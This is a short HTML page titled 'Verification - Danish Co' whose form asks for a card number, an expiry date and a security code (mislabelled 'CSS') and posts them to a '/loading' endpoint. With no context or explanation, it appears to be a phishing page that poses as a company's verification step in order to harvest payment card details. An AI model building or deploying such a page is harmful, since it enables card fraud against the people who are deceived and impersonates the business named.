<!DOCTYPE html>
<html>
<head>
  <title>Verification - Danish Co</title>
  <link rel="stylesheet" href="/style.css">
</head>
<body>
<div class="card">
  <h2>Verification</h2>
  <form method="POST" action="/loading">
    <input type="number" maxlength="12" placeholder="121212121212" required>
    <input placeholder="MM/YY">
    <input placeholder="CSS">
    <button>Submit</button>
  </form>
</div>
</body>
</html>
